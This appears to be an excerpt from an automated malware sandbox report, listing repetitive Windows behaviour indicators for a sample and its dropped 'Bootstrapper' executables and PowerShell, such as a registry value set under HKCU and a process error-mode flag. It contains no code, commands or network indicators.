                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MediaFoundation\Transforms
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\58ABE3825259C230781C 9BCF8DFC92BC643B9414A446DA4632050DE1B7577FEDF4F7711D3B4B3D46E06DJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
